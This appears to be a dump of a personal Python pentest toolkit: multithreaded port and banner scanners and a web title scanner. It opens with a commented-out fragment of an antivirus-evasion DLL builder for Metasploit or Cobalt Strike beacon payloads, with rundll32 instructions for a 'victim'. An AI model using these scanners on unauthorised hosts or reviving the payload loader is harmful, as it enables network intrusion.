[*]") 164 | # # os.system("rm " + e1 + ".cpp") 165 | # # time.sleep(1) 166 | # 167 | # print("[*] Execute on your Windows x64 victim with: [*]") 168 | # print("[*] rundll32 " + e1 + ".dll, " + e1 + " [*]") 169 | # time.sleep(2) 170 | # print("\n") 171 | # 172 | # 173 | # if __name__ == "__main__": 174 | # banner = """ 175 | # Miansha Dll Write By Komomon 176 | # """ 177 | # print(banner) 178 | # parser = argparse.ArgumentParser(usage="", description="des") 179 | # parser.add_argument("-f", "--file", type=str, dest="file", default="beacon.bin", help="The raw file from MSF or CS") 180 | # # parser.add_argument("--port", type=int, dest="port", default=22, help="ports to scan") 181 | # # parser.add_argument("-t", "--timeout", type=int, default=10, dest="timeout", help="Request timeout") 182 | # # parser.add_argument("-u", "--user", type=str, required=True, dest="username", help="Username") 183 | # # parser.add_argument("-p", "--pass", type=str, required=True, dest="password", help="Password") 184 | # args = parser.parse_args() 185 | # Beacon_file = args.file 186 | # main(beaconbin_file=Beacon_file) 187 | -------------------------------------------------------------------------------- /Myportscan.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import threading 3 | from queue import Queue 4 | import time 5 | import argparse 6 | 7 | # import argparse 8 | ''' 9 | 端口探测全类封装版,管道+探测 10 | 11 | 经过不断测试,发现一个问题 12 | 通过socket 发送包,如果认为目标,不响应则认为端口是关闭的, 13 | 但是有些端口是开放的,但是端口会回应你内容, 14 | 所以,如果不设置超时 通过s.recv(1024)会一直无响应,程序中断不了,一直在那卡着 15 | 16 | 默认不打印关闭端口信息 17 | ''' 18 | 19 | 20 | class Myportscan: 21 | def __init__(self, ips=None, ports=None, queue=None, timeout=2): 22 | self.ips = ips 23 | self.ports = ports 24 | self.queue = queue 25 | self.timeout = timeout 26 | socket.setdefaulttimeout(timeout) 27 | 28 | def get_port(self): 29 | # 80 - 100, 3380 - 3390 30 | port_list = [] 31 | port_segments = self.ports.split(',') 32 | for 
port_segment in port_segments: 33 | if '-' in port_segment: 34 | start, end = port_segment.split('-') 35 | for i in range(int(start), int(end) + 1): 36 | port_list.append(i) 37 | else: 38 | port_list.append(port_segment) 39 | 40 | return port_list 41 | 42 | def get_ip(self): 43 | # 10.10.10.10/24 10.10.10.10-20 10.10.10.10 10.10.10.11 44 | ips = self.ips 45 | ip_list = [] 46 | if '/' in self.ips: 47 | # 192.168.1.1/24 48 | ip_csection = self.ips.rsplit('.', 1)[0] 49 | # 将需要 ping 的 ip 加入队列 50 | for i in range(1, 256): 51 | ip_list.append(i) 52 | elif '-' in self.ips: 53 | # 192.168.1.2-10 54 | start_ip = self.ips.rsplit('-', 1) 55 | ip_csection, start = start_ip[0].rsplit('.', 1) 56 | end = int(start_ip[1]) + 1 57 | for i in range(int(start), end): 58 | ip_list.append(i) 59 | else: 60 | ip_list.append(self.ips) 61 | return ip_list 62 | 63 | def queue_put(self): 64 | ip_list = self.get_ip() 65 | port_list = self.get_port() 66 | for ip in ip_list: 67 | for port in port_list: 68 | self.queue.put((ip, port)) 69 | 70 | def get_a_port_isalive(self, ip, port): 71 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 72 | try: 73 | server.connect((ip, int(port))) 74 | # result = '[+] {0}:{1} open'.format(ip, port) 75 | # print(result) 76 | # return ('1', ip, port) 77 | # return result 78 | return True 79 | except Exception as e: 80 | # result = '[-] {0}:{1} close'.format(ip, port) 81 | # print(result) 82 | # return ('0', ip, port) 83 | # return result 84 | return False 85 | finally: 86 | server.close() 87 | 88 | # 获取banner,主要是为开放的端口进行获取开放的端口的banner 89 | def get_a_port_banner(self, ip, port): 90 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 91 | try: 92 | server.connect((ip, int(port))) 93 | banner = server.recv(1024).decode() 94 | return banner 95 | except Exception as e: 96 | return None # 空没有获取到banner 97 | finally: 98 | server.close() 99 | 100 | # 探端口,只探活 101 | def port_alive_scanner(self): 102 | while not self.queue.empty(): 103 | ip, port = 
self.queue.get() 104 | port_isalive = self.get_a_port_isalive(ip, port) 105 | if port_isalive is True: 106 | scan_result = '[+] {0}:{1} open'.format(ip, port) 107 | print(scan_result) 108 | return scan_result 109 | elif port_isalive is False: 110 | # scan_result = '[-] {0}:{1} close'.format(ip, port) 111 | # print(scan_result) 112 | # return scan_result 113 | pass 114 | 115 | # 探活+获取banner,先探活,然后获取banner 116 | def port_alive_and_banner_scanner(self): 117 | while not self.queue.empty(): 118 | ip, port = self.queue.get() 119 | port_isalive = self.get_a_port_isalive(ip, port) 120 | if port_isalive is True: 121 | port_banner = self.get_a_port_banner(ip, port) 122 | scan_result = '[+] {0}:{1} open {2}'.format(ip, port, port_banner) 123 | print(scan_result) 124 | return scan_result 125 | elif port_isalive is False: 126 | # scan_result = '[-] {0}:{1} close'.format(ip, port) 127 | # print(scan_result) 128 | # return scan_result 129 | pass 130 | 131 | 132 | if __name__ == '__main__': 133 | title = ''' 134 | python3 portscan.py -p 80,81 10.10.10.10 135 | python3 portscan.py -p 80-100,3380-3390 10.10.10.10 10.10.10.11 136 | python3 portscan.py -p 1-65535 10.10.10.10-20 137 | python3 portscan.py -p 80,90-100 10.10.10.10/24 138 | ''' 139 | parser = argparse.ArgumentParser(usage=title, description="Multithread Portscan,the defalut threads is 50.") 140 | parser.add_argument("-H", type=str, dest="hosts", required=True, help="Hosts to scan") 141 | parser.add_argument("-p", type=str, dest="ports", help="ports to scan") 142 | parser.add_argument("-s", "--simple", default=True, type=bool, dest="simple_scan", help="alive scan") 143 | parser.add_argument("-a", "-all", default=False, type=bool, dest="all_scan", help="banner scan") 144 | parser.add_argument("-t", "--thread", default=50, type=int, dest="threads", help="threads") 145 | parser.add_argument("--timeout", default=2, type=int, dest="timeout", help="timeout") 146 | args = parser.parse_args() 147 | Thread_maxnum = args.threads 148 
| ips = args.hosts 149 | ports = args.ports 150 | timeout = 2 151 | if args.timeout != 0 and args.timeout > 0: 152 | timeout = args.timeout 153 | else: 154 | print("--timeout Setting error.") 155 | exit(1) 156 | 157 | IP_PORT_QUEUE = Queue() 158 | Portscanner = Myportscan(ips, ports, IP_PORT_QUEUE, timeout) 159 | threads = [] 160 | start_time = time.time() 161 | # 读取数据,存入管道 162 | Portscanner.queue_put() 163 | if args.simple_scan is True: 164 | for i in range(Thread_maxnum): 165 | thread = threading.Thread(target=Portscanner.port_alive_scanner) 166 | thread.start() 167 | threads.append(thread) 168 | for thread in threads: 169 | thread.join() 170 | elif args.all_scan is True: 171 | for i in range(Thread_maxnum): 172 | thread = threading.Thread(target=Portscanner.port_alive_and_banner_scanner) 173 | thread.start() 174 | threads.append(thread) 175 | for thread in threads: 176 | thread.join() 177 | -------------------------------------------------------------------------------- /Myportscan2.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import threading 3 | from queue import Queue 4 | import time 5 | import argparse 6 | 7 | # import argparse 8 | ''' 9 | 10 | 端口探测全类封装版,管道+探测 11 | 12 | 2021.7.27 13 | 实现多IP、IP段(10-20),C段 端口扫描+banner扫描 14 | 经过不断测试,发现一个问题 15 | 通过socket 发送包,如果认为目标,不响应则认为端口是关闭的, 16 | 但是有些端口是开放的,但是端口会回应你内容, 17 | 所以,如果不设置超时 通过s.recv(1024)会一直无响应,程序中断不了,一直在那卡着 18 | 19 | 2021.8.1 20 | 添加-f参数从文件读取多IP机制 21 | 22 | 默认不打印关闭端口信息 23 | 24 | ''' 25 | 26 | 27 | class Myportscan: 28 | def __init__(self, ips=None, ipfile=None, ports=None, queue=None, timeout=2): 29 | self.ips = ips 30 | self.ipfile = ipfile 31 | self.ports = ports 32 | self.queue = queue 33 | self.timeout = timeout 34 | socket.setdefaulttimeout(timeout) 35 | 36 | def get_port(self): 37 | # 80 - 100, 3380 - 3390 38 | port_list = [] 39 | port_segments = self.ports.split(',') 40 | for port_segment in port_segments: 41 | if '-' in port_segment: 42 | 
start, end = port_segment.split('-') 43 | for i in range(int(start), int(end) + 1): 44 | port_list.append(i) 45 | else: 46 | port_list.append(port_segment) 47 | 48 | return port_list 49 | 50 | def get_ip(self): 51 | # 10.10.10.10/24 10.10.10.10-20 10.10.10.10 10.10.10.11 52 | ip_section_list = [] 53 | ip_list = [] 54 | if self.ips is not None: 55 | ip_section_list.append(self.ips) 56 | elif self.ipfile is not None: 57 | with open(self.ipfile, 'r', encoding='utf-8') as f: 58 | for line in f: 59 | if line.strip() != '': 60 | ip_section_list.append(line.strip()) 61 | for ips in ip_section_list: 62 | if '/24' in ips: 63 | # 192.168.1.1/24 64 | ip_csection = ips.rsplit('.', 1)[0] 65 | # 将需要 ping 的 ip 加入队列 66 | for i in range(1, 256): 67 | ip_list.append(i) 68 | elif '-' in ips: 69 | # 192.168.1.2-10 70 | start_ip = ips.rsplit('-', 1) 71 | ip_csection, start = start_ip[0].rsplit('.', 1) 72 | end = int(start_ip[1]) + 1 73 | for i in range(int(start), end): 74 | ip_list.append(i) 75 | elif ',' in ips: 76 | iplist = ips.split(',') 77 | ip_list.extend(iplist) 78 | else: 79 | ip_list.append(ips) 80 | return ip_list 81 | 82 | def queue_put(self): 83 | ip_list = self.get_ip() 84 | port_list = self.get_port() 85 | for ip in ip_list: 86 | for port in port_list: 87 | self.queue.put((ip, port)) 88 | 89 | def get_a_port_isalive(self, ip, port): 90 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 91 | try: 92 | server.connect((ip, int(port))) 93 | # result = '[+] {0}:{1} open'.format(ip, port) 94 | # print(result) 95 | # return ('1', ip, port) 96 | # return result 97 | return True 98 | except Exception as e: 99 | # result = '[-] {0}:{1} close'.format(ip, port) 100 | # print(result) 101 | # return ('0', ip, port) 102 | # return result 103 | return False 104 | finally: 105 | server.close() 106 | 107 | # 获取banner,主要是为开放的端口进行获取开放的端口的banner 108 | def get_a_port_banner(self, ip, port): 109 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 110 | try: 111 | 
server.connect((ip, int(port))) 112 | banner = server.recv(1024).decode() 113 | return banner 114 | except Exception as e: 115 | return None # 空没有获取到banner 116 | finally: 117 | server.close() 118 | 119 | # 探端口,只探活 120 | def port_alive_scanner(self): 121 | while not self.queue.empty(): 122 | ip, port = self.queue.get() 123 | port_isalive = self.get_a_port_isalive(ip, port) 124 | if port_isalive is True: 125 | scan_result = '[+] {0}:{1} open'.format(ip, port) 126 | print(scan_result) 127 | return scan_result 128 | elif port_isalive is False: 129 | # scan_result = '[-] {0}:{1} close'.format(ip, port) 130 | # print(scan_result) 131 | # return scan_result 132 | pass 133 | 134 | # 探活+获取banner,先探活,然后获取banner 135 | def port_alive_and_banner_scanner(self): 136 | while not self.queue.empty(): 137 | ip, port = self.queue.get() 138 | port_isalive = self.get_a_port_isalive(ip, port) 139 | if port_isalive is True: 140 | port_banner = self.get_a_port_banner(ip, port) 141 | scan_result = '[+] {0}:{1} open {2}'.format(ip, port, port_banner) 142 | print(scan_result) 143 | return scan_result 144 | elif port_isalive is False: 145 | # scan_result = '[-] {0}:{1} close'.format(ip, port) 146 | # print(scan_result) 147 | # return scan_result 148 | pass 149 | 150 | 151 | if __name__ == '__main__': 152 | title = ''' 153 | python3 portscan.py -H 192.168.148.128/24 -p 10-90 154 | python3 portscan.py -H 192.168.148.128/24 -p 10-90 -s 155 | python3 portscan.py -H 192.168.148.128/24 -p 10-90 -a 156 | python3 portscan.py -H 192.168.148.128/24 -p 10-90 -t 100 157 | python3 portscan.py -H 10.10.10.10,10.10.10.11 -p 10-90 158 | python3 portscan.py -f ip.txt -p 10-90 -a 159 | ''' 160 | parser = argparse.ArgumentParser(usage=title, description="Multithread Portscan,the defalut threads is 50.") 161 | parser.add_argument("-f", "--file", default=None, type=str, dest="ipfile", help="IP file to scan") 162 | parser.add_argument("-H", "--host", type=str, dest="hosts", required=True, help="Hosts to scan") 163 
| parser.add_argument("-p", "--port", type=str, dest="ports", help="ports to scan") 164 | parser.add_argument("-s", "--simple", default=True, type=bool, dest="simple_scan", help="alive scan") 165 | parser.add_argument("-a", "-all", default=False, type=bool, dest="all_scan", help="banner scan") 166 | parser.add_argument("-t", "--thread", default=50, type=int, dest="threads", help="threads") 167 | parser.add_argument("--timeout", default=2, type=int, dest="timeout", help="timeout") 168 | args = parser.parse_args() 169 | Thread_maxnum = args.threads 170 | ipfile = args.ipfile 171 | ips = args.hosts 172 | ports = args.ports 173 | timeout = 2 174 | if args.timeout != 0 and args.timeout > 0: 175 | timeout = args.timeout 176 | else: 177 | print("--timeout Setting error.") 178 | exit(1) 179 | 180 | IP_PORT_QUEUE = Queue() 181 | Portscanner = Myportscan(ips, ports, IP_PORT_QUEUE, timeout) 182 | threads = [] 183 | start_time = time.time() 184 | # 读取数据,存入管道 185 | Portscanner.queue_put() 186 | if args.simple_scan is True: 187 | for i in range(Thread_maxnum): 188 | thread = threading.Thread(target=Portscanner.port_alive_scanner) 189 | thread.start() 190 | threads.append(thread) 191 | for thread in threads: 192 | thread.join() 193 | elif args.all_scan is True: 194 | for i in range(Thread_maxnum): 195 | thread = threading.Thread(target=Portscanner.port_alive_and_banner_scanner) 196 | thread.start() 197 | threads.append(thread) 198 | for thread in threads: 199 | thread.join() 200 | -------------------------------------------------------------------------------- /Myportscan单线程函数版.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | import socket 4 | import queue 5 | 6 | Thread_maxnum = 50 7 | 8 | 9 | # 获取端口开放情况 10 | def portScanner(host, port): 11 | try: 12 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 13 | s.connect((host, port)) 14 | # print(s.recv(1024)) 15 | print('[+] %d open' % 
port) 16 | s.close() 17 | except: 18 | print('[-] %d close' % port) 19 | 20 | 21 | # 获取端口banner 22 | def get_a_port_banner(ip, port): 23 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 24 | try: 25 | server.connect((ip, int(port))) 26 | banner = server.recv(1024).decode() 27 | return banner 28 | except Exception as e: 29 | return None # 空没有获取到banner 30 | finally: 31 | server.close() 32 | 33 | 34 | def main(): 35 | # setdefaulttimeout(1) 36 | for p in [6002, 6003]: 37 | portScanner('192.168.148.128', p) 38 | 39 | 40 | if __name__ == '__main__': 41 | main() 42 | -------------------------------------------------------------------------------- /Myportscan端口扫描 扫描封装到类单线程版本.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | 4 | '''端口扫描 扫描封装到类单线程版本''' 5 | 6 | class Myportscan: 7 | def __init__(self, ip='', port='', timeout=2): 8 | self.ip = ip 9 | self.port = port 10 | self.timeout = timeout 11 | socket.setdefaulttimeout(timeout) 12 | 13 | def get_port_isalive(self, ip, port): 14 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 15 | try: 16 | server.connect((ip, int(port))) 17 | # result = '[+] {0}:{1} open'.format(ip, port) 18 | # print(result) 19 | # return ('1', ip, port) 20 | # return result 21 | return True 22 | except Exception as e: 23 | # result = '[-] {0}:{1} close'.format(ip, port) 24 | # print(result) 25 | # return ('0', ip, port) 26 | # return result 27 | return False 28 | finally: 29 | server.close() 30 | 31 | # 获取banner,主要是为开放的端口进行获取开放的端口的banner 32 | def get_port_banner(self, ip, port): 33 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 34 | try: 35 | server.connect((ip, int(port))) 36 | banner = server.recv(1024).decode() 37 | return banner 38 | except Exception as e: 39 | return None # 空没有获取到banner 40 | finally: 41 | server.close() 42 | 43 | # 探开放+获取banner,先探活,然后获取banner 44 | def port_alive_and_banner_scan(self, ip, port): 45 | if self.get_port_isalive(ip, 
port) is True: 46 | port_banner = self.get_port_banner(ip, port) 47 | result = '[+] {0}:{1} open {2}'.format(ip, port, port_banner) 48 | return result 49 | elif self.get_port_isalive(ip, port) is False: 50 | result = '[-] {0}:{1} close'.format(ip, port) 51 | return result 52 | 53 | # 探端口,只探活 54 | def port_alive_scan(self, ip, port): 55 | if self.get_port_isalive(ip, port) is True: 56 | result = '[+] {0}:{1} open'.format(ip, port) 57 | return result 58 | elif self.get_port_isalive(ip, port) is False: 59 | result = '[-] {0}:{1} close'.format(ip, port) 60 | return result 61 | 62 | 63 | 64 | 65 | def get_ip_status(ip, port): 66 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 67 | # server.settimeout(3) 68 | try: 69 | server.connect((ip, int(port))) 70 | print(server.recv(1024)) 71 | print(server) 72 | # print(server.recv(1024).decode()) 73 | print('[+] {0}:{1} open'.format(ip, port)) 74 | except Exception as err: 75 | # print(err) 76 | print('[-] {0}:{1} close'.format(ip, port)) 77 | finally: 78 | server.close() 79 | 80 | 81 | if __name__ == '__main__': 82 | host = '192.168.148.128' 83 | socket.setdefaulttimeout(1) 84 | # for port in range(20, 100): 85 | for port in [6002, 6003, 6004, 6005]: 86 | get_ip_status(host, port) -------------------------------------------------------------------------------- /Myportscan端口探测封装到类版.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import threading 3 | from queue import Queue 4 | import sys 5 | import time 6 | import argparse 7 | 8 | # import argparse 9 | ''' 10 | 经过不断测试,发现一个问题 11 | 通过socket 发送包,如果认为目标,不响应则认为端口是关闭的, 12 | 但是有些端口是开放的,但是端口会回应你内容, 13 | 所以,如果不设置超时 通过s.recv(1024)会一直无响应,程序中断不了,一直在那卡着 14 | 15 | 单端口探测封装到类版 16 | 17 | ''' 18 | 19 | 20 | class Myportscan: 21 | def __init__(self, ip='', port='', timeout=2): 22 | self.ip = ip 23 | self.port = port 24 | self.timeout = timeout 25 | socket.setdefaulttimeout(timeout) 26 | 27 | def get_a_port_isalive(self, ip, 
port): 28 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 29 | try: 30 | server.connect((ip, int(port))) 31 | # result = '[+] {0}:{1} open'.format(ip, port) 32 | # print(result) 33 | # return ('1', ip, port) 34 | # return result 35 | return True 36 | except Exception as e: 37 | # result = '[-] {0}:{1} close'.format(ip, port) 38 | # print(result) 39 | # return ('0', ip, port) 40 | # return result 41 | return False 42 | finally: 43 | server.close() 44 | 45 | # 获取banner,主要是为开放的端口进行获取开放的端口的banner 46 | def get_a_port_banner(self, ip, port): 47 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 48 | try: 49 | server.connect((ip, int(port))) 50 | banner = server.recv(1024).decode() 51 | return banner 52 | except Exception as e: 53 | return None # 空没有获取到banner 54 | finally: 55 | server.close() 56 | 57 | # 探开放+获取banner,先探活,然后获取banner 58 | def port_alive_and_banner_scan(self, ip, port): 59 | if self.get_a_port_isalive(ip, port) is True: 60 | port_banner = self.get_a_port_banner(ip, port) 61 | result = '[+] {0}:{1} open {2}'.format(ip, port, port_banner) 62 | return result 63 | elif self.get_a_port_isalive(ip, port) is False: 64 | result = '[-] {0}:{1} close'.format(ip, port) 65 | return result 66 | 67 | # 探端口,只探活 68 | def port_alive_scan(self, ip, port): 69 | if self.get_a_port_isalive(ip, port) is True: 70 | result = '[+] {0}:{1} open'.format(ip, port) 71 | return result 72 | elif self.get_a_port_isalive(ip, port) is False: 73 | result = '[-] {0}:{1} close'.format(ip, port) 74 | return result 75 | 76 | 77 | def get_port(ports): 78 | # 80 - 100, 3380 - 3390 79 | port_list = [] 80 | port_segments = ports.split(',') 81 | for port_segment in port_segments: 82 | if '-' in port_segment: 83 | start, end = port_segment.split('-') 84 | for i in range(int(start), int(end) + 1): 85 | port_list.append(i) 86 | else: 87 | port_list.append(port_segment) 88 | 89 | return port_list 90 | 91 | 92 | def get_ip(ips): 93 | # 10.10.10.10/24 10.10.10.10-20 10.10.10.10 
10.10.10.11 94 | ip_list = [] 95 | if '/' in ips: 96 | # 192.168.1.1/24 97 | ip_csection = ips.rsplit('.', 1)[0] 98 | # 将需要 ping 的 ip 加入队列 99 | for i in range(1, 256): 100 | ip_list.append(i) 101 | elif '-' in ips: 102 | # 192.168.1.2-10 103 | start_ip = ips.rsplit('-', 1) 104 | ip_csection, start = start_ip[0].rsplit('.', 1) 105 | end = int(start_ip[1]) + 1 106 | for i in range(int(start), end): 107 | ip_list.append(i) 108 | else: 109 | ip_list.append(ips) 110 | return ip_list 111 | 112 | 113 | def alive_scanner(queue, timeout=2): 114 | while not queue.empty(): 115 | ip, port = queue.get() 116 | scanner = Myportscan(timeout) 117 | scan_result = scanner.port_alive_scan(ip, port) 118 | print(scan_result) 119 | 120 | 121 | def alive_and_banner_scanner(queue, timeout): 122 | while not queue.empty(): 123 | ip, port = queue.get() 124 | scanner = Myportscan(timeout) 125 | scan_result = scanner.port_alive_and_banner_scan(ip, port) 126 | print(scan_result) 127 | 128 | 129 | if __name__ == '__main__': 130 | title = ''' 131 | Multithread ping,the defalut threads is 50. 
132 | Usage: 133 | python3 portscan.py -p 80,81 10.10.10.10 134 | python3 portscan.py -p 80-100,3380-3390 10.10.10.10 10.10.10.11 135 | python3 portscan.py -p 1-65535 10.10.10.10-20 136 | python3 portscan.py -p 80,90-100 10.10.10.10/24 137 | ''' 138 | 139 | parser = argparse.ArgumentParser(usage="it's usage tip.", description=title) 140 | parser.add_argument("-H", type=str, dest="hosts", required=True, help="Hosts to scan") 141 | parser.add_argument("-p", type=str, dest="ports", help="ports to scan") 142 | parser.add_argument("-s", "--simple", default=True, type=bool, dest="simple_scan", help="alive scan") 143 | parser.add_argument("-a", "-all", default=False, type=bool, dest="all_scan", help="banner scan") 144 | parser.add_argument("-t", "--thread", default=50, type=int, dest="threads", help="threads") 145 | parser.add_argument("--timeout", default=2, type=int, dest="timeout", help="timeout") 146 | args = parser.parse_args() 147 | Thread_maxnum = args.threads 148 | ip_list = get_ip(args.hosts) 149 | port_list = get_port(args.ports) 150 | timeout = 2 151 | if args.timeout != 0 and args.timeout > 0: 152 | timeout = args.timeout 153 | else: 154 | print("--timeout Setting error.") 155 | exit(1) 156 | 157 | IP_PORT_QUEUE = Queue() 158 | 159 | for i in ip_list: 160 | for j in port_list: 161 | IP_PORT_QUEUE.put((i, j)) 162 | threads = [] 163 | start_time = time.time() 164 | 165 | if args.simple_scan is True: 166 | # print(2) 167 | for i in range(Thread_maxnum): 168 | # print(1) 169 | thread = threading.Thread(target=alive_scanner, args=(IP_PORT_QUEUE, timeout,)) 170 | thread.start() 171 | threads.append(thread) 172 | for thread in threads: 173 | thread.join() 174 | elif args.all_scan is True: 175 | for i in range(Thread_maxnum): 176 | thread = threading.Thread(target=alive_and_banner_scanner(), args=(IP_PORT_QUEUE, timeout)) 177 | thread.start() 178 | threads.append(thread) 179 | for thread in threads: 180 | thread.join() 181 | 
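-------------------------------------------------------------------------------- /Mywebscan.py: --------------------------------------------------------------------------------
import requests
import argparse
from queue import Queue, Empty
import threading
import random
import csv
import datetime, os
from bs4 import BeautifulSoup
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

'''
Multithreaded web banner scan: URL -> status code, <title>, optionally headers/body, written to a CSV file.
'''


class My_web_banner_scan:
    """Fetch every URL from a shared queue and record status code, title and (optionally) headers/body.

    Args:
        queue: Queue of URL strings shared by the worker threads.
        url_file: Kept only for interface compatibility; URLs are fed with get_url_from_file().
        csvfile: Output CSV path, or None to print rows instead. The header row is written on construction.
        timeout: Per-request timeout in seconds, passed to requests.get().
        saveheadbody: When True the response headers and body are stored in the CSV as well.
        verify: Verify TLS certificates (default True). Pass False only for authorised targets with
            self-signed certificates; the InsecureRequestWarning is already silenced above for that case.
    """

    def __init__(self, queue=None, url_file=None, csvfile=None, timeout=2, saveheadbody=False, verify=True):
        self.timeout = timeout
        self.queue = queue
        self.url_file = url_file  # not used; kept so existing callers still work
        self.csvfile = csvfile
        self.saveheadbody = saveheadbody
        self.verify = verify
        # Several worker threads append to the same CSV file; serialise writes so rows never interleave.
        self._write_lock = threading.Lock()
        self.initialize_outputfile()

    # Random User-Agent so the probes are not trivially fingerprinted by one fixed UA string.
    def random_useragent(self):
        USER_AGENTS = [
            "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
            "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
            "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
            "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
            "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
            "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
            "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
            "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
            "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
            "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
            "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
            "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
            "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
            "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
        ]
        return random.choice(USER_AGENTS)

    # HTTP/HTTPS request: status code, <title>, and optionally headers + body.
    def get_web_banner(self, url):
        """Return one CSV row for *url*: [url, status_code, title, timeout, headers, body].

        ``timeout`` is 1 when the request itself failed (timeout, connection refused, TLS error,
        malformed URL ...) and 0 otherwise; a page without a <title> is not an error and simply gets
        an empty title. On failure status_code and title are empty strings. This method never raises,
        so one dead host cannot kill a worker thread (an unhandled exception in a Thread target
        silently ends that worker and the remaining URLs it would have handled).
        """
        header = {'User-Agent': self.random_useragent()}
        try:
            # Honour the configured timeout and TLS policy instead of the previously hard-coded 2 s.
            res = requests.get(url, headers=header, timeout=self.timeout, verify=self.verify)
        except requests.exceptions.RequestException as e:
            print(url, "request failed:", type(e).__name__, "- Can set --timeout")
            return [url, "", "", 1, "", ""]
        res.encoding = "utf-8"
        status_code = str(res.status_code)
        html = res.text
        soup = BeautifulSoup(html, "lxml")
        # soup.title is None when the page has no <title>; .string is None when the tag has nested markup.
        if soup.title is not None and soup.title.string is not None:
            title = str(soup.title.string)
        else:
            title = ""
        timeout = 0
        if self.saveheadbody is False:
            return [url, status_code, title, timeout, "", ""]
        return [url, status_code, title, timeout, res.headers, html]

    # Feed URLs (one per line) from a file into the queue.
    def get_url_from_file(self, url_file):
        with open(url_file, 'r', encoding='utf-8') as f:
            for line in f:
                url = line.strip()
                # A blank line would otherwise become an invalid-URL request and a junk CSV row.
                if url:
                    self.queue.put(url)

    def initialize_outputfile(self):
        """Write the CSV header row (truncating any existing file). No-op when csvfile is None."""
        if self.csvfile is None:
            return
        # newline='' is required by the csv module so rows are not separated by blank lines.
        with open(self.csvfile, 'w', newline='') as f:
            header = ['URL', 'status_code', 'title', 'timeout', 'headers', 'body']
            writer = csv.writer(f)
            writer.writerow(header)

    def write_file(self, data):
        """Append one result row to the CSV; locked because all workers share the same file."""
        with self._write_lock:
            with open(self.csvfile, 'a+', newline='') as f:
                writer = csv.writer(f)
                writer.writerow(data)

    def web_banner(self):
        """Worker loop: drain the queue, writing (or printing) one row per URL, then return."""
        while True:
            try:
                # get_nowait() instead of empty()/get(): with several workers the last item can be
                # taken between the two calls, and a blocking get() would then hang the thread forever.
                url = self.queue.get_nowait()
            except Empty:
                return
            result = self.get_web_banner(url)
            if self.csvfile is not None:
                self.write_file(result)
            else:
                print(result)


if __name__ == '__main__':
    usage = """
    GET url status code,title,body And write csv file.

    """
    parser = argparse.ArgumentParser(usage=usage, description="")
    parser.add_argument("-f", "--file", type=str, default=None, dest="file", help="URL file")
    parser.add_argument("-hb", "--headbody", default=False, action="store_true", dest="saveheadbody",
                        help="Store header and body")
    parser.add_argument("-o", "--output", type=str, default=datetime.datetime.now().strftime("%Y%m%d%H%M%S") + '.csv',
                        dest="outputfile",
                        help="Result to csv")
    parser.add_argument("-t", "--thread", type=int, default=50, dest="threads", help="Threads")
    parser.add_argument("--timeout", type=int, default=2, dest="timeout", help="Request timeout")
    parser.add_argument("--no-verify", default=False, action="store_true", dest="no_verify",
                        help="Do not verify TLS certificates (self-signed targets only)")
    args = parser.parse_args()
    if args.file is None:
        # get_url_from_file(None) would fail with a TypeError; give a usable error instead.
        parser.error("-f/--file is required")
    Thread_maxnum = args.threads
    timeout = 2
    thread_list = []
    URL_QUEUE = Queue()
    if args.timeout != 0 and args.timeout > 0:
        timeout = args.timeout
    else:
        print("--timeout Setting error.")
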